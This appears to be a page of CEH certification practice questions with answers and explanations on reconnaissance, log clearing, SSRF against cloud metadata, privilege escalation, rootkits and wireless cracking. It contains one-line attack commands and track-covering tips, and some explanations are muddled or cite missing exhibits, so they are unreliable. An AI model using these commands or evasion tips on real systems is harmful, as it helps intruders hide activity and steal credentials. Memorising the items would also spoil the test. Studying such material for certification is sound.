
Certified Ethical Hacker (CEH) — Questions 901–975

1010 questions total · 14 pages · All types, answers revealed

Page 13 of 14
901
Multi-Select · hard

Which THREE of the following are valid techniques for covering tracks after compromising a system? (Select 3 correct answers)

Select 3 answers
A. Clearing event logs using wevtutil
B. Exploiting SUID binaries to gain root
C. Installing a rootkit to hide malicious processes
D. Using timestomp to modify file timestamps
E. Disabling Windows Defender via Group Policy
Answers: A, C, D

Clearing logs removes evidence of activity.

Why this answer

A is correct because wevtutil is a Windows command-line utility used to manage event logs. After compromising a system, an attacker can use 'wevtutil cl' followed by a log name (e.g., 'wevtutil cl System') to clear specific event logs, thereby erasing evidence of their activities. This is a direct and common technique for covering tracks by removing forensic artifacts.

Exam trap

EC-Council often tests the distinction between privilege escalation (gaining higher access) and covering tracks (hiding evidence), causing candidates to mistakenly select SUID exploitation as a track-covering technique.

902
Multi-Select · easy

Which TWO of the following are valid port states that Nmap can report? (Select 2)

Select 2 answers
A. Unknown
B. Secured
C. Open
D. Filtered
E. Blocked
Answers: C, D

An open port has a service listening and accepting connections.

Why this answer

Nmap reports 'Open' when a port responds to a probe (e.g., SYN, ACK, or connect scan) with a positive acknowledgment, indicating a service is actively listening. This is one of the six fundamental port states defined in Nmap's output, directly derived from the TCP/IP protocol behavior during the scan.

Exam trap

The trap here is that candidates confuse 'filtered' with generic terms like 'blocked' or 'secured', or assume Nmap uses a catch-all 'unknown' state, when in fact Nmap has a precise, limited set of six states that must be memorized for the CEH exam.

903
Multi-Select · easy

Which TWO of the following are enumeration techniques?

Select 2 answers
A. Buffer overflow
B. Cross-site scripting
C. LDAP enumeration
D. SQL injection
E. SMTP enumeration
Answers: C, E

LDAP enumeration queries directory services for information.

Why this answer

Options C and E are correct. LDAP enumeration and SMTP enumeration are both enumeration techniques used to gather information about users, systems, or services.

904
MCQ · easy

A company wants to test the security of its web application by simulating attacks from an external perspective. They have no prior knowledge of the internal network or application architecture. Which type of test should they perform?

A. Black-box test
B. White-box test
C. Red team engagement
D. Gray-box test
Answer: A

Black-box test simulates an external attacker with no prior knowledge.

Why this answer

A black-box test is the correct choice because the company has no prior knowledge of the internal network or application architecture. This simulates an external attacker with zero insider information, testing the application from an outsider's perspective without access to source code, network diagrams, or credentials. The test relies solely on publicly available information and direct interaction with the application's interfaces.

Exam trap

The trap here is that candidates often confuse 'black-box test' with 'red team engagement', but red team engagements are broader and may include internal knowledge or physical attacks, whereas a black-box test strictly limits information to what is publicly available.

How to eliminate wrong answers

Option B (White-box test) is wrong because it requires full knowledge of the internal architecture, source code, and network design, which contradicts the 'no prior knowledge' condition. Option C (Red team engagement) is wrong because it is a broader, goal-oriented simulation that often includes social engineering and physical breaches, not solely an external web application test without internal knowledge. Option D (Gray-box test) is wrong because it involves partial knowledge (e.g., credentials or API documentation), which the company explicitly lacks.

905
MCQ · medium

A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?

A. Smurf attack
B. UDP flood
C. SYN flood
D. ICMP flood
Answer: C

Half-open TCP connections indicate a SYN flood.

Why this answer

A SYN flood sends many SYN packets without completing the handshake, exhausting server resources.

906
MCQ · hard

A security team detects unusual outbound traffic from a host that appears to be a reverse shell. Which of the following Nmap features would be MOST effective for identifying the service running on the listening port of the command-and-control server?

A. UDP scan using the -sU flag
B. Nmap Scripting Engine (NSE) with the http-enum script
C. OS fingerprinting using the -O flag
D. Service version detection using the -sV flag
Answer: D

-sV probes open ports and compares responses to identify service names and versions, which is ideal for identifying a reverse shell service.

Why this answer

Option D is correct because the -sV flag instructs Nmap to perform service version detection by probing open ports and analyzing the responses to determine the exact application and version running on the listening port. In a reverse shell scenario, identifying the service (e.g., a specific SSH, HTTP, or custom listener) on the C2 server is critical for understanding the attack vector and planning remediation.

Exam trap

The trap here is that candidates confuse OS fingerprinting (-O) with service version detection (-sV), thinking that identifying the OS will reveal the service, but the CEH exam emphasizes that -sV is the dedicated flag for service and version identification on listening ports.

How to eliminate wrong answers

Option A is wrong because a UDP scan (-sU) is used to discover UDP services, but reverse shells typically use TCP for reliable communication, and UDP scanning would not effectively identify a TCP-based listening service. Option B is wrong because the http-enum script is designed to enumerate directories and files on HTTP/HTTPS services, but the C2 server may not be running a web service, and this script does not perform general service identification. Option C is wrong because OS fingerprinting (-O) determines the operating system of the target host, not the specific service or application version running on a listening port, which is irrelevant for identifying the C2 service.

907
MCQ · easy

Which of the following is the correct order of phases in the system hacking methodology known as CHPSET?

A. Spying, Erasing, Cracking, Hiding, Privilege escalation, Executing
B. Privilege escalation, Cracking, Hiding, Executing, Spying, Erasing
C. Executing, Cracking, Spying, Hiding, Privilege escalation, Erasing
D. Cracking, Hiding, Privilege escalation, Executing, Spying, Erasing
Answer: D

CHPSET order: Cracking, Hiding, Privilege escalation, Executing, Spying, Erasing.

Why this answer

The CHPSET methodology in system hacking stands for Cracking, Hiding, Privilege escalation, Executing, Spying, Erasing. Option D correctly lists these phases in order: Cracking (password cracking), Hiding (covering tracks), Privilege escalation (gaining higher access), Executing (running malicious code), Spying (monitoring activity), and Erasing (removing evidence). This sequence follows the logical progression from initial access to maintaining access and finally covering tracks.

Exam trap

The trap here is that candidates often confuse the order of Hiding and Privilege escalation, mistakenly thinking hiding occurs first, but in CHPSET, hiding (covering tracks) happens after privilege escalation to conceal the elevated access and subsequent actions.

How to eliminate wrong answers

Option A is wrong because it starts with Spying and Erasing, which are later phases, and misplaces Cracking after Erasing; the correct order begins with Cracking. Option B is wrong because it places Privilege escalation and Cracking before Hiding, but Hiding (covering tracks) typically occurs after privilege escalation and execution to conceal the attacker's presence. Option C is wrong because it starts with Executing and Cracking, but Cracking must occur before execution to obtain credentials for access, and Spying is placed too early before privilege escalation.

908
MCQ · easy

Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?

A. Social Engineering Toolkit (SET)
B. Nmap
C. Wireshark
D. Ettercap
Answer: A

SET includes credential harvesting modules that clone legitimate sites.

Why this answer

The Social Engineering Toolkit (SET) has a website attack vector for cloning login pages and can interface with Metasploit for payload delivery.

909
MCQ · medium

A security analyst observes the following log entry on a web server: 'GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1'. This request appears to originate from a compromised web application. Which cloud attack technique is being attempted?

A. Server-Side Request Forgery (SSRF)
B. SQL Injection
C. Container escape
D. Cross-Site Scripting (XSS)
Answer: A

Correct. The request to the cloud metadata service is a classic SSRF attack to obtain instance credentials.

Why this answer

The IP address 169.254.169.254 is the AWS instance metadata service endpoint. An attacker using a Server-Side Request Forgery (SSRF) vulnerability can force the server to request this URL and retrieve sensitive instance metadata, such as IAM credentials.

910
MCQ · hard

An attacker sends a TCP SYN packet to a port and receives a TCP RST packet in response. According to Nmap's port state classification, what is the state of this port?

A. Filtered
B. Unfiltered
C. Closed
D. Open
Answer: C

A closed port responds with RST.

Why this answer

When Nmap sends a TCP SYN packet to a port and receives a TCP RST packet in response, it indicates that the port is reachable but no service is listening on it. Per RFC 793, a RST is sent when a SYN arrives on a closed port, so Nmap classifies this port as 'closed'.

Exam trap

EC-Council often tests the misconception that a RST response means the port is 'filtered' or 'open', but the correct interpretation per Nmap's classification is that a RST directly indicates a 'closed' port.

How to eliminate wrong answers

Option A is wrong because 'filtered' means the probe was dropped or blocked by a firewall or packet filter (no response or ICMP unreachable), not a TCP RST. Option B is wrong because 'unfiltered' is a special state used only in ACK scans (e.g., -sA) where the port is reachable but its open/closed status cannot be determined; it does not apply to a SYN scan receiving a RST. Option D is wrong because an 'open' port would respond with a SYN-ACK, not a RST.

911
MCQ · medium

Refer to the exhibit. An analyst runs an Nmap scan and finds these services. Which known vulnerability is most likely to be successfully exploited?

A. CVE-2021-41773 (Apache Path Traversal)
B. CVE-2017-5638 (Struts2 RCE)
C. CVE-2014-0160 (Heartbleed)
D. CVE-2020-1472 (Zerologon)
Answer: A

Apache 2.4.49 is vulnerable to CVE-2021-41773, a path traversal and remote code execution vulnerability.

912
MCQ · medium

After compromising a system, an attacker wants to erase their tracks. They clear the Windows Event Logs using `wevtutil cl` commands. However, the logs are forwarded to a remote SIEM. Which covering tracks technique would be MOST effective to avoid detection?

A. Modify specific event log entries to remove evidence of their actions
B. Disable Windows Event Log service (EventLog)
C. Use a rootkit to hide files and processes
D. Encrypt the log files
Answer: A

Selective modification can remove incriminating entries while keeping normal logging, reducing suspicion.

Why this answer

If logs are forwarded to a remote SIEM, local log deletion will still leave traces in the SIEM, and bulk clearing of logs is itself an event that can raise an alert. A better approach is to manipulate specific log entries (e.g., modify or delete only the incriminating entries) so that normal logging continues. Among the given options, selective log modification is therefore the best answer.

913
MCQ · hard

During a forensic investigation, an analyst retrieves a suspicious executable. Running 'strings' reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into 'explorer.exe'. Which conclusion is MOST accurate?

A. The file is a worm because it connects to a remote IP
B. The file is likely a packed trojan that evades signature-based detection
C. The file is benign because static analysis found no indicators
D. The file is a false positive and the sandbox environment is compromised
Answer: B

Lack of strings and zero AV detections suggest packing; sandbox behavior confirms malice.

Why this answer

The binary evades static analysis (packed, no strings, undetected by AV) but exhibits malicious behavior in dynamic analysis (network connection, process injection). This suggests it is a packed or obfuscated trojan.

914
Multi-Select · hard

Which THREE of the following are methods for covering tracks after compromising a system? (Select 3)

Select 3 answers
A. Installing a rootkit to hide files and processes
B. Escalating privileges to SYSTEM
C. Disabling antivirus software
D. Using steganography to hide stolen data in images
E. Clearing event logs
Answers: A, D, E

Rootkits help hide evidence.

Why this answer

Covering tracks includes log manipulation (clearing or modifying logs), using rootkits to hide processes/files, and steganography to hide malicious data. Disabling antivirus is more of an evasion technique during the attack, not specifically covering tracks. Privilege escalation is a different phase.

915
Multi-Select · easy

A penetration tester successfully gains access to a Linux server as a low-privilege user. The goal is to escalate to root. Which THREE methods could the tester use to achieve privilege escalation?

Select 3 answers
A. Enumerate SUID binaries with 'find / -perm -4000'
B. Exploit a vulnerable SUID binary to spawn a root shell
C. Use 'sudo -l' to list allowed commands and exploit misconfigurations
D. Check /etc/shadow for weak password hashes
E. Run a local kernel exploit that matches the kernel version
Answers: B, C, E

If a SUID binary has a vulnerability, it can be used to execute commands as root.

Why this answer

Options B, C, and E are correct. Exploiting SUID binaries, sudo misconfigurations, and kernel exploits are common Linux privilege escalation techniques. A and D are enumeration steps, not escalation methods.

916
Multi-Select · hard

Which THREE of the following attacks target cryptographic weaknesses?

Select 3 answers
A. Downgrade attack
B. Replay attack
C. Cross-site scripting
D. Birthday attack
E. SQL injection
Answers: A, B, D

Forces a system to use weaker, more vulnerable encryption.

Why this answer

A downgrade attack is correct because it forces a system to use a weaker, less secure cryptographic protocol or algorithm (e.g., forcing TLS 1.2 down to SSL 3.0 or using export-grade ciphers). This exploits the cryptographic weakness of the older protocol, making it easier for an attacker to decrypt or manipulate the communication. The attack directly targets the cryptographic strength of the negotiated security parameters.

Exam trap

The trap here is that candidates often confuse 'replay attack' (option B) as purely a cryptographic attack, but it is actually a protocol-level attack that can succeed even with strong cryptography if no nonce or timestamp is used, while the Birthday attack (option D) is a direct cryptographic weakness based on hash collision probability.

917
MCQ · medium

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

A. Cross-Site Scripting (XSS)
B. Directory traversal
C. Server-Side Request Forgery (SSRF)
D. SQL injection
Answer: A

Reflecting user input (User-Agent) without sanitization allows XSS.

Why this answer

Reflecting unsanitized input in HTTP headers can lead to reflected XSS.

918
MCQ · medium

Which cloud security assessment tool is specifically designed to audit AWS environments against best practices and CIS benchmarks?

A. Pacu
B. ScoutSuite
C. Nessus
D. Metasploit
Answer: B

ScoutSuite performs cloud security audits.

Why this answer

ScoutSuite is an open-source tool that audits cloud environments (AWS, Azure, GCP) for security misconfigurations.

919
MCQ · easy

A security analyst runs the command `nbtstat -A 192.168.1.105` on a Windows machine. What information is the analyst most likely trying to gather?

A. The NetBIOS name table and MAC address of the remote host
B. The LDAP directory structure of the domain
C. The SNMP community strings of the target
D. The SMB shares available on the remote host
Answer: A

nbtstat -A shows NetBIOS names, type, and MAC address for the given IP.

Why this answer

The `nbtstat -A` command performs a NetBIOS name table lookup against the specified IP address using the NetBIOS over TCP/IP (NBT) protocol. It returns the remote host's NetBIOS name table, which includes registered names and services, along with the MAC address of the network adapter. This is a standard enumeration technique to identify the hostname, logged-in user, and other NetBIOS-related information.

Exam trap

The trap here is that candidates confuse `nbtstat -A` with `net view` or `nbtstat -a`, mistakenly thinking it lists SMB shares or uses a hostname instead of an IP address, when in fact `-A` specifically targets a remote IP and returns the NetBIOS name table and MAC.

How to eliminate wrong answers

Option B is wrong because LDAP directory structure is queried using LDAP-specific tools like `ldapsearch` or `nslookup` with SRV records, not `nbtstat`. Option C is wrong because SNMP community strings are obtained via SNMP enumeration tools like `snmpwalk` or `snmpenum`, not through NetBIOS commands. Option D is wrong because SMB shares are enumerated using commands like `net view` or tools like `smbclient`, while `nbtstat` only reveals NetBIOS names and MAC addresses, not share listings.

920
MCQ · medium

During a penetration test, you capture the following 4-way handshake using airodump-ng. Which tool would you use to attempt a dictionary attack to recover the WPA2 passphrase?

A. Reaver
B. Aircrack-ng
C. Kismet
D. John the Ripper
Answer: B

Aircrack-ng can perform dictionary attacks on captured 4-way handshakes.

Why this answer

Aircrack-ng is the standard tool for cracking WPA/WPA2 handshakes using dictionary attacks.

921
Multi-Select · easy

Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)

Select 2 answers
A. Remains constant in code to ensure replication
B. Mutates its code to evade signature detection
C. Uses encryption with a variable key
D. Spreads via network shares
E. Resides in the boot sector of a hard drive
Answers: B, C

Polymorphic viruses change their code pattern each time they replicate.

Why this answer

Option B is correct because a polymorphic virus mutates its code—typically by using a mutation engine—while preserving its original functionality. This mutation changes the virus's signature each time it replicates, allowing it to evade signature-based detection by antivirus software. Option C is correct because polymorphic viruses commonly use encryption with a variable key; the virus body is encrypted, and the decryption routine mutates, so the encrypted payload looks different with each infection.

Exam trap

The trap here is that candidates often confuse 'polymorphic' with 'metamorphic' or assume that all viruses that use encryption are polymorphic, but the key distinction is that polymorphic viruses use a variable key and mutate the decryption routine, whereas simple encrypted viruses use a fixed key and do not change their decryptor.

922
MCQ · medium

Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?

A. Ettercap
B. Wireshark
C. Nmap
D. macof
Answer: D

macof is designed for MAC flooding attacks.

Why this answer

macof is a tool that floods a switch with random MAC addresses to overflow the CAM table, causing the switch to operate as a hub.

923
MCQ · medium

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

A. Using a list of compromised credentials from a data breach
B. Trying many passwords for a single account
C. Trying a few common passwords against many accounts
D. Using automated tools to bypass CAPTCHA
Answer: C

Password spraying targets many accounts with a small set of common passwords to avoid lockouts.

Why this answer

Password spraying uses a few common passwords against many accounts to avoid account lockout.

924
MCQ · medium

Which Google dork would a penetration tester use to find login pages that are indexed by Google?

A. filetype:xls username password
B. intitle:"index of"
C. inurl:login
D. site:example.com intext:password
Answer: C

This searches for pages with 'login' in the URL, typically login forms.

Why this answer

Option C is correct because the Google dork 'inurl:login' specifically searches for URLs containing the word 'login', which commonly appear in login page paths (e.g., /login.php, /login.aspx). This allows a penetration tester to quickly identify indexed login portals for further reconnaissance, such as testing for default credentials or brute-force attacks.

Exam trap

The trap here is that candidates often confuse 'inurl:login' with 'intitle:login' or 'intext:login', but 'inurl:' is the precise operator for finding login pages by their URL structure, while 'intitle:' and 'intext:' target page titles and body content, respectively, which are less reliable for this specific purpose.

How to eliminate wrong answers

Option A is wrong because 'filetype:xls username password' targets Excel files that may contain credentials, not login pages. Option B is wrong because 'intitle:"index of"' reveals directory listings (e.g., open Apache indexes), not login pages. Option D is wrong because 'site:example.com intext:password' searches for pages containing the word 'password' in their body text, which could be any page (e.g., password reset forms or help pages), not specifically login pages.

925
MCQ · medium

In a cloud environment, which of the following is an example of a Server-Side Request Forgery (SSRF) attack?

A. An attacker exploits a web application to send HTTP requests from the server to an internal metadata endpoint
B. An attacker intercepts traffic between a load balancer and backend servers
C. An attacker uses a SQL injection to extract database contents
D. An attacker uploads a malicious file to an S3 bucket that executes code on the server
Answer: A

SSRF allows the attacker to use the server as a proxy to access internal systems like the cloud metadata service (169.254.169.254).

Why this answer

SSRF occurs when an attacker tricks the server into making requests to internal resources, such as a cloud metadata service, to obtain credentials.

926
Multi-Select · hard

Which TWO of the following are examples of hybrid password attacks? (Select 2 correct answers)

Select 2 answers
A. Using a wordlist to try every possible password in the list
B. Using a dictionary file and appending random numbers to each word
C. Using a set of rules with Hashcat to modify dictionary words (e.g., leet speak substitutions)
D. Generating all possible character combinations up to a certain length
E. Cracking passwords using precomputed rainbow tables
Answers: B, C

This combines dictionary with brute force (numbers) – a hybrid.

Why this answer

Option B is correct because a hybrid password attack combines a dictionary or wordlist with additional modifications, such as appending random numbers to each word. This approach leverages common password patterns where users often add digits to a base word to meet complexity requirements, making it more effective than a simple dictionary attack.

Exam trap

EC-Council often tests the distinction between hybrid attacks and other attack types, and the trap here is that candidates may confuse a dictionary attack (Option A) with a hybrid attack, or mistake brute-force (Option D) or rainbow tables (Option E) as hybrid methods, when in fact hybrid attacks specifically combine a dictionary with rule-based modifications or appendages.

927
Multi-Select · hard

During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?

Select 3 answers
A. It functions as a remote access Trojan (RAT)
B. It is classified as a Trojan horse
C. It is a polymorphic virus that changes its signature each time it runs
D. It is a worm that replicates across the network automatically
E. It is capable of exfiltrating data to a remote server
Answers: A, B, E

Opens a backdoor and sends info, typical RAT behavior.

Why this answer

This is a Trojan horse that acts as a remote access Trojan (RAT): it opens a backdoor to allow remote control and sends system information to a remote server, which is data exfiltration. The other options do not fit: polymorphic viruses change their code on each replication, and worms self-propagate across the network without user action.

928
Multi-Select · hard

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)

Select 3 answers
A. Implementing Multi-Factor Authentication (MFA)
B. Using HTTP GET requests for state-changing operations
C. Setting SameSite cookies to Lax or Strict
D. Including a unique CSRF token in each request
E. Validating the Origin or Referer header
Answers: C, D, E

SameSite attribute prevents cookies from being sent in cross-site requests.

Why this answer

SameSite cookies restrict which cross-site requests carry the session cookie. CSRF tokens provide a unique per-request secret that a cross-site attacker cannot read. Request headers such as Origin or Referer, or custom headers (e.g., X-Requested-With), can be checked by the server.

Double Submit Cookies can also be used but are less common. MFA does not prevent CSRF, and using GET for state-changing operations makes CSRF easier, not harder.

929
Multi-Select, medium

Which TWO of the following tools are used for cloud security auditing or exploitation?

Select 2 answers
A. ScoutSuite
B. John the Ripper
C. Pacu
D. Nessus
E. Aircrack-ng
Answers: A, C

ScoutSuite is a security auditing tool for cloud environments.

Why this answer

ScoutSuite is an auditing tool and Pacu is an exploitation framework for cloud environments.

930
MCQ, easy

A penetration tester discovers that a target Windows system has port 445 open and responds to SMB requests. Which tool should the tester use to enumerate users, shares, and OS information from this system?

A. Nikto
B. Hydra
C. Nmap
D. enum4linux
Answer: D

Correct: enum4linux extracts SMB information like users, shares, and OS details.

Why this answer

enum4linux is a tool specifically designed to enumerate information from Windows and Samba systems via SMB. It leverages the SMB protocol to extract users, shares, OS details, and other system information from a target with port 445 open, making it the correct choice for this scenario.

Exam trap

The trap here is that candidates may choose Nmap because it is a versatile tool that can perform SMB enumeration with scripts, but the CEH exam expects the specialized tool (enum4linux) for this specific task, as Nmap is primarily a port scanner and not the dedicated enumeration tool.

How to eliminate wrong answers

Option A is wrong because Nikto is a web server scanner that tests for vulnerabilities in HTTP/HTTPS services, not for SMB enumeration. Option B is wrong because Hydra is a password brute-forcing tool used for online attacks against various services, not for passive enumeration of users, shares, or OS information. Option C is wrong because while Nmap can detect open ports and perform basic SMB enumeration via scripts (e.g., smb-enum-shares), it is not the dedicated tool for comprehensive SMB enumeration; enum4linux is purpose-built for this task.

931
MCQ, easy

Which SNMP community string is typically used for read-only access by default on many devices?

A. snmp
B. private
C. admin
D. public
Answer: D

'public' is the default read-only community string.

Why this answer

The default read-only community string in SNMPv1 and SNMPv2c is 'public'. This string acts as a password that allows an SNMP manager to query device MIB objects for monitoring purposes without making configuration changes. It is widely documented in RFC 1157 and is the standard default across most networking equipment.

Exam trap

The trap here is that candidates often confuse 'public' with 'private', mistakenly thinking 'private' is the read-only string, when in fact 'private' is the default read-write community string.

How to eliminate wrong answers

Option A is wrong because 'snmp' is not a standard default community string; it is occasionally used as a custom string but never as a default. Option B is wrong because 'private' is the default read-write community string, granting write access to modify device configurations, not read-only. Option C is wrong because 'admin' is a common administrative username, not an SNMP community string; SNMP community strings are separate from device login credentials.

932
MCQ, easy

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

A. SQLMap
B. Nmap
C. Burp Suite
D. John the Ripper
Answer: A

SQLMap is designed for automated SQL injection.

Why this answer

SQLMap is the industry-standard tool for automating SQL injection detection and exploitation.

933
MCQ, medium

A penetration tester uses the tool Reaver to target a Wi-Fi network. What vulnerability is the tester attempting to exploit?

A. WPA2 4-way handshake capture
B. WPS PIN brute-force weakness
C. Weak WEP encryption keys
D. RADIUS authentication bypass
Answer: B

Reaver performs a brute-force attack on the WPS PIN (typically 8 digits) to recover the WPA/WPA2 PSK.

Why this answer

Reaver is a tool specifically designed to exploit the WPS (Wi-Fi Protected Setup) PIN brute-force vulnerability. It targets the WPS registrar's lack of rate-limiting and the fact that the PIN is split into two halves (first half 4 digits, second half 3 digits with a checksum), allowing an attacker to recover the WPS PIN and subsequently the WPA2 pre-shared key in a matter of hours.

Exam trap

EC-Council often tests the distinction between WPS PIN brute-force (Reaver) and WPA2 handshake capture (aircrack-ng); the trap is that candidates associate any wireless attack with handshake capture rather than recognizing the specific tool-to-vulnerability mapping.

How to eliminate wrong answers

Option A is wrong because capturing a WPA2 4-way handshake is performed with tools like airodump-ng or Wireshark, not Reaver; Reaver does not capture handshakes but instead brute-forces the WPS PIN. Option C is wrong because weak WEP encryption keys are exploited using tools like aircrack-ng or WEP cracking techniques (e.g., ARP replay attacks), not Reaver, which is designed for WPS attacks on WPA/WPA2 networks. Option D is wrong because RADIUS authentication bypass typically targets enterprise 802.1X networks using tools like asleap or hostapd-wpe, not Reaver, which operates on the WPS protocol used in personal (PSK) mode.

934
MCQ, medium

An IoT device uses MQTT for communication. An attacker intercepts MQTT packets and observes that the publish messages are not encrypted and contain plaintext sensor data. Which of the following is the BEST recommendation to secure MQTT traffic?

A. Base64-encode the payload
B. Switch to CoAP protocol
C. Use MQTT over TLS
D. Implement a VPN on the device
Answer: C

Correct: MQTT over TLS (MQTTS) encrypts the connection, preventing eavesdropping.

Why this answer

MQTT itself does not provide encryption; using TLS (MQTT over TLS) encrypts the entire communication channel, protecting data in transit.

935
MCQ, hard

After gaining initial access to a Linux server, a penetration tester wants to maintain persistence by creating a backdoor. The tester decides to replace a common system binary with a trojanized version. Which of the following techniques is MOST likely to evade detection by file integrity monitoring (FIM) systems?

A. Replace the binary with a modified version that has the same file size and timestamp
B. Place the backdoor in a directory that is excluded from FIM monitoring
C. Use steganography to hide the backdoor inside an image file
D. Use a kernel-level rootkit that intercepts read operations to present the original binary's content
Answer: D

A rootkit can hook system calls to return the original file content when FIM reads it, while the modified binary runs.

Why this answer

Rootkits at the kernel level can intercept system calls and hide file changes from FIM. DKOM rootkits modify kernel objects to hide processes and files, making detection difficult.

936
Multi-Select, medium

Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)

Select 2 answers
A. HTTP flood
B. Smurf attack
C. SYN flood
D. UDP flood
E. Slowloris
Answers: A, E

HTTP flood sends many HTTP GET/POST requests, overloading the application.

Why this answer

Slowloris keeps many connections open by sending partial HTTP requests, and HTTP flood sends a high volume of legitimate-looking HTTP requests. Both target the application layer.

937
MCQ, medium

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

A. Repeater
B. Proxy
C. Scanner
D. Intruder
Answer: A

Repeater allows sending and resending individual requests with manual modifications.

Why this answer

Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.

938
MCQ, medium

A cloud security engineer discovers that an S3 bucket named 'acme-backups' is accessible to anyone with the bucket URL. The bucket contains sensitive customer data. Which AWS shared responsibility model component does this misconfiguration primarily violate?

A. AWS is responsible for physical security of data centers
B. The customer is responsible for patching the S3 service
C. The customer is responsible for configuring access controls and permissions
D. AWS is responsible for network infrastructure; the customer for data classification
Answer: C

Correct. S3 bucket policies and permissions are customer-managed security controls.

Why this answer

Under the AWS shared responsibility model, the customer is responsible for configuring S3 bucket policies and access controls. The misconfiguration is a customer-side issue, not an infrastructure vulnerability.

939
Multi-Select, hard

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)

Select 3 answers
A. Directory traversal
B. Credential stuffing
C. Brute-force attack
D. SQL injection
E. Password spraying
Answers: B, C, E

Valid usernames can be used with breached password lists.

Why this answer

With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.

940
MCQ, medium

Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?

A. Ettercap
B. Wireshark
C. Nmap
D. tcpdump
Answer: A

Ettercap includes DNS spoofing functionality.

Why this answer

Ettercap has a DNS spoofing plugin that can redirect DNS queries to malicious IPs. Other tools like dnsspoof also exist, but Ettercap is a common multipurpose MITM tool.

941
MCQ, hard

An attacker uses `nmap -sI 10.0.0.5 192.168.1.10` to scan a target. This technique is known as an idle scan. Which condition is REQUIRED for this scan to work correctly?

A. The zombie host must be running a Windows operating system
B. The attacker must have root access on the target machine
C. The zombie host must have an incremental IP ID sequence that is not reset by other traffic
D. The target must be running a Linux server with SSH enabled
Answer: C

The idle scan relies on observing changes in the zombie's IP ID to infer port status. If the zombie receives other traffic, the IP ID may increment, causing false results.

Why this answer

The idle scan (nmap -sI) relies on the zombie host's IP ID sequence being predictable and incremental. The attacker probes the zombie's IP ID, sends a spoofed SYN packet to the target (appearing from the zombie), and then re-checks the zombie's IP ID. If the IP ID has increased by exactly 2 (or more if other traffic occurred), the target responded to the zombie, confirming the port is open.

The zombie must not reset or randomize its IP ID, and other traffic to the zombie must be minimal or accounted for, making an incremental IP ID sequence the essential condition.

Exam trap

EC-Council often tests the misconception that the zombie must be idle or that the target must have a specific service, but the core requirement is the zombie's IP ID sequence being incremental and not reset by other traffic.

How to eliminate wrong answers

Option A is wrong because the idle scan does not require any specific operating system on the zombie; it works with any host that uses an incremental IP ID sequence (e.g., many legacy Windows, Linux, or BSD systems). Option B is wrong because the attacker does not need root access on the target machine; the scan is performed externally, and root access is only needed on the attacker's machine to send raw packets (e.g., via libpcap). Option D is wrong because the target's operating system or SSH service is irrelevant; the idle scan works against any TCP port on any target, regardless of OS or running services.

942
MCQ, easy

You are a security consultant for a mid-sized company with 500 employees. The company has a secure data center with a biometric access control system. Recently, a contractor was able to enter the data center without authorization by claiming he forgot his badge and an employee held the door for him. The contractor then accessed sensitive servers and exfiltrated data. The company wants to prevent such incidents. Which physical security control would be most effective in preventing this type of attack?

A. Install CCTV cameras to monitor the entrance.
B. Require employees to wear RFID badges at all times.
C. Implement a mantrap with biometric and badge authentication.
D. Hire additional security guards at the entrance.
Answer: C

Mantraps physically prevent tailgating by requiring one person at a time.

Why this answer

Option C is correct because a mantrap with biometric and badge authentication enforces strict two-person authentication: both the contractor and the employee must independently authenticate before the mantrap doors unlock. This prevents tailgating (piggybacking) by ensuring only one person enters per authentication cycle, eliminating the social engineering vector where an employee holds the door for an unauthorized individual.

Exam trap

The trap here is that candidates often choose CCTV or guards because they seem like obvious physical security measures, but the question specifically targets tailgating/piggybacking, which only a mantrap with dual authentication can reliably prevent.

How to eliminate wrong answers

Option A is wrong because CCTV cameras are passive monitoring tools; they do not prevent unauthorized entry, only record it after the fact, and cannot stop tailgating in real time. Option B is wrong because requiring RFID badges at all times does not prevent an employee from holding the door for an unauthorized person; badges alone cannot enforce one-person-per-entry. Option D is wrong because additional security guards can still be socially engineered or fail to notice tailgating, and guards introduce human error and cost without the deterministic access control of a mantrap.

943
MCQ, hard

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

A. Credential stuffing
B. Brute force attack
C. Password spraying
D. Dictionary attack
Answer: C

Password spraying uses a few common passwords against many accounts, or against a single account from many IPs.

Why this answer

Password spraying uses a small set of common passwords against many accounts or, as in this case, against a single account from multiple IPs to avoid lockout.

944
MCQ, hard

Refer to the exhibit. During a wireless audit, you capture a beacon frame from a corporate access point. What is the most significant security concern based on this information?

A. The pairwise cipher is CCMP, which is outdated.
B. The network uses WPA2-PSK, which is easily cracked.
C. The beacon frame reveals the BSSID, which is a security risk.
D. The group cipher is TKIP, which is deprecated and vulnerable.
Answer: D

TKIP should not be used.

Why this answer

Option D is correct because TKIP (Temporal Key Integrity Protocol) is a deprecated encryption protocol that was part of the original WPA standard. It is vulnerable to several attacks, including the Michael attack and the Beck-Tews attack, which can allow an attacker to decrypt traffic or inject packets. In a modern WPA2 network, TKIP should never be used as the group cipher; only CCMP (AES) is considered secure.

Exam trap

